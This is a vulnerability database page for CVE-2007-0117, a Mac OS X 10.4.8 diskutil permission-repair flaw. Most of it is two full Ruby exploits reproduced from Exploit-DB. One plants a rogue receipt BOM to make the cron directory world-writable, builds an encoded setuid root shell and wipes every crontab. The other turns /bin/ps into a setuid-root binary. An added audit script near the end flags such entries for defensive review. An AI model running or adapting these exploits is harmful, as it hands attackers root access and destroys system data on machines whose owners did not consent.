CVE-2007-0117 : Detail

CVE-2007-0117

6.5%V4
Attack vector: Network
Published: 2007-01-09 01h00 +00:00
Last updated: 2007-01-12 09h00 +00:00

CVE Descriptions

DiskManagementTool in the DiskManagement.framework 92.29 on Mac OS X 10.4.8 does not properly validate Bill of Materials (BOM) files, which allows attackers to gain privileges via a BOM file under /Library/Receipts/, which triggers arbitrary file permission changes upon execution of a diskutil permission repair operation.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov

Note that this vector rates the issue as reachable over the network without authentication (AV:N, Au:N), whereas both exploits listed on this page need an existing local account that can write under /Library/Receipts/ and then run diskutil. Read the 10.0 as NVD's scoring of the impact (full root compromise), not as evidence that the flaw is exploitable remotely.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs, so the percentile is the way to compare one CVE's EPSS score with the rest of the population.

Exploit information

Exploit Database EDB-ID : 3088

Publication date : 2007-01-04 23h00 +00:00
Author : MoAB
EDB Verified : Yes

```ruby
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting)
# Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll)
#
# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.
# And works like a charm.
#
# How it works: a throwaway directory tree /tmp/pwndertino/var/cron/tabs is created
# with mode 777 and turned into a BOM with mkbom. That BOM is copied over the
# Essentials.pkg receipt's Archive.bom, so the next `diskutil repairPermissions /`
# applies mode 777 to the real /var/cron/tabs. Root's crontab is then writable by the
# current user, and the cron entries below compile and setuid a root shell.

require 'fileutils'

# Commands appended to root's crontab (each runs every minute until the cleanup entries fire).
EVIL_COMMANDS = [
  "rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ",
  # Hex-escaped C source: main(){ seteuid(0); setegid(0); setuid(0); setgid(0); system("/bin/sh -i"); }
  "echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\\x20\\x7d\\x0a\" > /tmp/finisterre.c",
  "/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c",
  "/bin/cp -r /var/cron/tabs /Users/Shared", # I have no legit crontabs so I don't care.
  "/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5",
  "echo '' > /tmp/pwnclean",
  "for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done", # Sorry if you had any legit crontabs...
  "crontab /tmp/pwnclean", # Just to make sure
  "rm -rf /tmp/pwn*",
]

TARGET_BOM_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"

# Shell stage: build the rogue BOM, install it over the receipt, trigger the repair.
SHELL_TEMPLATE = "mkdir -p /tmp/pwndertino/var/cron/tabs\n" +
                 "cd /tmp/pwndertino\n" +
                 "chmod 777 var/cron/tabs\n" +
                 "mkbom . /tmp/pwned.bom\n" +
                 "cp /tmp/pwned.bom #{TARGET_BOM_PATH}\n" +
                 "/usr/sbin/diskutil repairPermissions /\n"

if ARGV[0] != "repair"
  # Backup if its there! Some times it is not.
  if File.exist?(TARGET_BOM_PATH)
    FileUtils.cp(TARGET_BOM_PATH, File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
  end

  puts "++ Dropping the 31337 .sh skillz"
  shell_script = File.new("moab5.sh", "w")
  shell_script.print(SHELL_TEMPLATE)

  puts "++ Fixing up crontabs"
  # After repairPermissions, /var/cron/tabs is mode 777, so root's crontab can be appended to.
  EVIL_COMMANDS.each do |cmd|
    shell_script.print("echo '* * * * * #{cmd}' >> /var/cron/tabs/root\n")
  end
  # The current user's own crontab removes the staging files.
  shell_script.print("echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\n")
  shell_script.print("crontab /tmp/pwncron\n")
  # You may need to sleep here
  shell_script.close

  puts "++ Execute moab5.sh"
  FileUtils.chmod 0755, "./moab5.sh"
  exec "/bin/sh", "-c", "./moab5.sh"
  puts "++ Run the repair script when you are all done." # never reached: exec replaces the process
else
  # minor repair for a post-testing scenario
  if File.exist?(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
    FileUtils.cp(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup
    FileUtils.rm_f(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)))
    exec "/usr/sbin/diskutil repairPermissions /"
  else
    exec "/usr/sbin/diskutil repairPermissions /"
  end
end

# milw0rm.com [2007-01-05]
```
Exploit Database EDB-ID : 3087

Publication date : 2007-01-04 23h00 +00:00
Author : MoAB
EDB Verified : Yes

```ruby
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#
# How it works: Evil.bom (shipped separately from this script, not reproduced here)
# is a BOM that records TARGET_BINARY with setuid-root permissions. Once it replaces
# the Essentials.pkg receipt, `diskutil repairPermissions /` chmods the real binary
# to match, and the script then swaps the binary's contents for TARGET_SHELL_PATH.

require 'fileutils'

# Basic configuration
TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH = "/usr/sbin/diskutil"
TEH_EVIL_BOM = File.read("Evil.bom")

#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
  puts "++ Repairing (moving back-ups to original path)"
  puts "++ #{File.basename(BOMARCHIVE_PATH)}"
  FileUtils.rm_f BOMARCHIVE_PATH
  FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH
  puts "++ #{TARGET_BINARY}"
  FileUtils.rm_f TARGET_BINARY
  FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY
  puts "++ Removing back-ups..."
  FileUtils.rm_f TARGET_BACKUP_PATH
  FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))
  puts "++ Done. Repairing disk permissions..."
  exec "#{DISKUTIL_PATH} repairPermissions /"
end

#
# Overwrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
  puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."
  # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
  # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
  # An alternative method is running diskutil again to set the rogue permissions.
  over = File.new(TARGET_BINARY, "w") # truncate in place: same inode, so the mode set by diskutil is kept
  over.write(File.read(TARGET_SHELL_PATH))
  over.close
  # If the write cleared the setuid bit, replace the file and let diskutil re-apply the BOM mode.
  unless FileTest.setuid?(TARGET_BINARY)
    fork do
      FileUtils.rm_f TARGET_BINARY
      FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
      exec "#{DISKUTIL_PATH} repairPermissions /"
    end
    Process.wait
  end
  puts "++ Done. Happy ruuting."
end

#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
  puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"
  # Back-up the original Archive.bom, set mode to 777
  if FileTest.writable?(BOMARCHIVE_PATH)
    backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))
    unless FileTest.exist?(backup_path)
      puts "++ Creating backup copy at #{backup_path}"
      FileUtils.cp BOMARCHIVE_PATH, backup_path
    end
    puts "++ Removing original file."
    FileUtils.rm_f BOMARCHIVE_PATH
    puts "++ Writing backdoor BOM file."
    target_bom = File.new(BOMARCHIVE_PATH, "w")
    target_bom.write(TEH_EVIL_BOM)
    target_bom.close
    puts "++ Done."
  else
    puts "-- Can't write to '#{BOMARCHIVE_PATH}'. No pwnage for you today."
    exit
  end

  # Back-up the target backdoor path
  unless FileTest.exist?(TARGET_BACKUP_PATH)
    puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
    FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
  end

  # Let diskutil do its job (set permissions over target binary path, setuid)
  puts "++ Running diskutil to set the new permissions for the backdoor..."
  fork do
    exec "#{DISKUTIL_PATH} repairPermissions /"
  end
  Process.wait
  puts "++ Somebody set up us the bomb!"
  exploit_bomb()
end

# Here be pwnies
if ARGV[0] == "repair"
  do_repair()
else
  set_up_the_bomb()
end

# milw0rm.com [2007-01-05]
```
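Both exploits work by planting a receipt BOM whose recorded modes diskutil repairPermissions then applies to the live filesystem: EDB-3087 records the target binary as setuid root, EDB-3088 records /var/cron/tabs as mode 777. The script below is an added audit example, written for this page and not taken from the CVE entry or the MoAB code. It parses a BOM listing and flags exactly those two classes of entry (setuid/setgid files and world-writable paths). The input format is modelled on lsbom's default tab-separated output (path, octal mode, uid/gid, then size and checksum for files); SAMPLE_LSBOM is a constructed listing, not output captured from a real receipt, and the script name in the usage note is hypothetical.

```ruby
#!/usr/bin/env ruby
# Receipt BOM audit: added example, not part of the CVE entry or the MoAB exploits.
# diskutil repairPermissions re-applies the modes recorded in every
# /Library/Receipts/*.pkg/Contents/Archive.bom, so a rogue BOM turns into a rogue
# chmod. This script flags the entries an attacker would plant: setuid/setgid files
# and world-writable directories or files.
#
# Input is modelled on lsbom's default tab-separated listing:
#   path <TAB> octal mode <TAB> uid/gid [<TAB> size <TAB> checksum]
# SAMPLE_LSBOM is a constructed listing (not captured from a real receipt);
# ./bin/ps (setuid) and ./var/cron/tabs (mode 777) mirror the two exploits above.

S_IFMT  = 0o170000
S_IFDIR = 0o040000
S_ISUID = 0o4000
S_ISGID = 0o2000
S_IWOTH = 0o0002

SAMPLE_LSBOM = <<~BOM
  .\t40755\t0/0
  ./bin\t40755\t0/0
  ./bin/ps\t104755\t0/0\t68432\t1185034305
  ./usr/bin/id\t100755\t0/0\t45392\t3391040831
  ./var/cron\t40755\t0/0
  ./var/cron/tabs\t40777\t0/0
  ./private/etc/sudoers\t100440\t0/0\t1242\t2170011221
BOM

BomEntry = Struct.new(:path, :mode, :uid, :gid)

# Parse one lsbom line. Returns nil for blank or malformed lines so a
# truncated listing does not abort the whole audit.
def parse_bom_line(line)
  fields = line.chomp.split("\t")
  return nil if fields.size < 3 || fields[1] !~ /\A[0-7]+\z/
  uid, gid = fields[2].split("/", 2).map(&:to_i)
  BomEntry.new(fields[0], fields[1].to_i(8), uid, gid)
end

# Return [path, reason] pairs for every entry whose recorded mode would be
# dangerous once repairPermissions applies it to the live filesystem.
def suspicious_entries(listing)
  findings = []
  listing.each_line do |line|
    e = parse_bom_line(line)
    next if e.nil?
    perm   = e.mode & 0o7777
    is_dir = (e.mode & S_IFMT) == S_IFDIR
    kind   = is_dir ? "directory" : "file"

    if !is_dir && (perm & S_ISUID) != 0
      owner = e.uid.zero? ? "root" : "uid #{e.uid}"
      findings << [e.path, "setuid #{owner} file (mode %o)" % perm]
    end
    findings << [e.path, "setgid file (mode %o)" % perm] if !is_dir && (perm & S_ISGID) != 0
    findings << [e.path, "world-writable #{kind} (mode %o)" % perm] if (perm & S_IWOTH) != 0
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  # Pass a saved `lsbom Archive.bom` listing as ARGV[0]; otherwise audit the sample.
  listing  = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_LSBOM
  findings = suspicious_entries(listing)
  findings.each { |path, why| puts "#{path}: #{why}" }
  puts "no suspicious entries" if findings.empty?
end
```

To run it against a real receipt, save the listing first (`lsbom /Library/Receipts/Essentials.pkg/Contents/Archive.bom > listing.txt`) and pass the file (`ruby bom_audit.rb listing.txt`). A setuid entry is not automatically malicious (legitimate receipts record setuid tools), so compare findings against the vendor's original receipt or a known-good copy; the point is that any receipt writable by a non-root user must be treated as a root-equivalent policy file.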

Products Mentioned

Configuration 0

Apple >> Mac OS X >> Version 10.4.8

Apple >> Mac OS X Server >> Version 10.4.8

References

http://secunia.com/advisories/23653
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/21899
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/0074
Tags : vdb-entry, x_refsource_VUPEN
http://osvdb.org/31167
Tags : vdb-entry, x_refsource_OSVDB